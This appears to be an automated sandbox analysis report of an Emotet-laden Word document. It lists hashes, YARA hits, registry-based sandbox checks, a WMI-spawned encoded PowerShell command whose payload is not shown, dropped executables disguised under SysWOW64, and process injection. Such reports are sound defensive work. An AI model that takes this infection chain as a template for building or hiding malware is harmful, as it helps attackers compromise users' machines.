Analysis

max time kernel: 24s
max time network: 32s
platform: windows10_x64
resource: win10
submitted: 27-10-2020 22:57
Static task: static1

General

Target: 6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc
Size: 191KB
MD5: 5380ac7e6bb601430d526324efcb3be1
SHA1: 3a2e6649282590cf90ad5438966c96d412ac11ec
SHA256: 6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495
SHA512: 246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2
Malware Config
Extracted
Extracted
emotet
Epoch2
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: POwersheLL.exe
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid / pid_target: 4276 / 3052
  process / target process: POwersheLL.exe

Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Resources matching yara_rule emotet:
  behavioral1/memory/4480-11-0x0000000002190000-0x00000000021A2000-memory.dmp
  behavioral1/memory/4480-12-0x0000000000520000-0x0000000000530000-memory.dmp
  behavioral1/memory/4364-15-0x0000000002130000-0x0000000002142000-memory.dmp
  behavioral1/memory/4364-16-0x0000000000680000-0x0000000000690000-memory.dmp

Blacklisted process makes network request (1 IoC)
Processes: POwersheLL.exe
  flow 15, pid 4276, process POwersheLL.exe

Executes dropped EXE (2 IoCs)
Processes: Ekkzsyr.exe, KBDBULG.exe
  pid 4480, process Ekkzsyr.exe
  pid 4364, process KBDBULG.exe

Drops file in System32 directory (1 IoC)
Processes: Ekkzsyr.exe
  File opened for modification: C:\Windows\SysWOW64\tapisrv\KBDBULG.exe (process Ekkzsyr.exe)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (process WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (process WINWORD.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (process WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (process WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (process WINWORD.EXE)

Modifies data under HKEY_USERS (1 IoC)
Processes: svchost.exe
  Key created: \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey (process svchost.exe)

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
  pid 4700, process WINWORD.EXE (listed 2 times)

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: POwersheLL.exe, KBDBULG.exe
  pid 4276, process POwersheLL.exe (listed 3 times)
  pid 4364, process KBDBULG.exe (listed 2 times)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: POwersheLL.exe
  Token: SeDebugPrivilege, pid 4276, process POwersheLL.exe

Suspicious use of SetWindowsHookEx (9 IoCs)
Processes: WINWORD.EXE, Ekkzsyr.exe, KBDBULG.exe
  pid 4700, process WINWORD.EXE (listed 7 times)
  pid 4480, process Ekkzsyr.exe
  pid 4364, process KBDBULG.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: Ekkzsyr.exe
  PID 4480 wrote to memory of 4364: pid 4480, process Ekkzsyr.exe, target process KBDBULG.exe (listed 3 times)
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
  Command line: POwersheLL -ENCOD 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
  - Process spawned unexpected child process
  - Blacklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
  Command line: C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\tapisrv\KBDBULG.exe (child of Ekkzsyr.exe)
      Command line: "C:\Windows\SysWOW64\tapisrv\KBDBULG.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx

\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc

\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService

\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
  - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
  MD5: bf55f45edb3c7fefca054aa6882696b7
  SHA1: 1c6ea4d638a7b71d909b5649549e0000a4e51e22
  SHA256: 11d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9
  SHA512: 84f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d

C:\Windows\SysWOW64\tapisrv\KBDBULG.exe
  MD5: bf55f45edb3c7fefca054aa6882696b7
  SHA1: 1c6ea4d638a7b71d909b5649549e0000a4e51e22
  SHA256: 11d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9
  SHA512: 84f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d

Memory dumps:
  memory/4276-7-0x0000027D58680000-0x0000027D58681000-memory.dmp (Filesize 4KB)
  memory/4276-8-0x0000027D58840000-0x0000027D58841000-memory.dmp (Filesize 4KB)
  memory/4276-6-0x00007FF8EBA00000-0x00007FF8EC3EC000-memory.dmp (Filesize 9.9MB)
  memory/4364-13-0x0000000000000000-mapping.dmp
  memory/4364-15-0x0000000002130000-0x0000000002142000-memory.dmp (Filesize 72KB)
  memory/4364-16-0x0000000000680000-0x0000000000690000-memory.dmp (Filesize 64KB)
  memory/4480-11-0x0000000002190000-0x00000000021A2000-memory.dmp (Filesize 72KB)
  memory/4480-12-0x0000000000520000-0x0000000000530000-memory.dmp (Filesize 64KB)
  memory/4700-0-0x00007FF8F2FA0000-0x00007FF8F35D7000-memory.dmp (Filesize 6.2MB)
  memory/4700-1-0x000001F0F6BE6000-0x000001F0F6BEF000-memory.dmp (Filesize 36KB)